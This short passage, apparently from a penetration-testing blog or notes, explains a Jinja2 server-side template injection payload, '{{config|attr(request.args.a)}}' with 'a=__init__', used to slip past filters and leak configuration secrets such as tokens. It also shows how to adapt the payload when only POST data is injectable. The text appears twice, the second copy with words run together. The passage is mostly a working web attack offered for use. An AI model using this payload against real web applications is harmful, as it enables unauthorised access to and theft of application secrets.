This feature will work like {{config|attr(request.args.a)}}&a=__init__ that leaking information like token, etc. Btw don't forget for the obfuscator
In my case if the web only be injectable with POST data, I need to change from {{config|attr(request.args.a)}}&a=__init__ to {{config|attr(request.args.a)}} and change the url path to http://<IP>/?a=__init__
This feature will work like
{{config|attr(request.args.a)}}&a=__init__
that leaking information like token, etc. Btw don't forget for the obfuscatorIn my case if the web only be injectable with POST data, I need to change from
{{config|attr(request.args.a)}}&a=__init__
to{{config|attr(request.args.a)}}
and change the url path tohttp://<IP>/?a=__init__